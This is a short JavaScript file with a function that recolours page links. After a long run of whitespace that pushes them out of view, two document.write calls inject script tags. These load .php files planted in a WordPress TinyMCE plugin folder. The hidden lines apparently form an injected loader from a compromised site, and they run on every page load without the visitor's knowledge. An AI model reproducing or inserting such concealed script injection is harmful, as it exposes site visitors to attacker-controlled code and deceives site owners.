function turnGray (speclink) {
	 var anchors = document.links
	 for (i=0; i<anchors.length; i++) {
    anchors[i].style.color = '#ffcc00';
	 }
	speclink.style.color = '#cccccc';
}																																																																							document.write('<script type="text/javascript" src="/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/quickformcheck.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/blog/wp-includes/js/tinymce/plugins/wordpress/menu_eng.php"><\/script>');
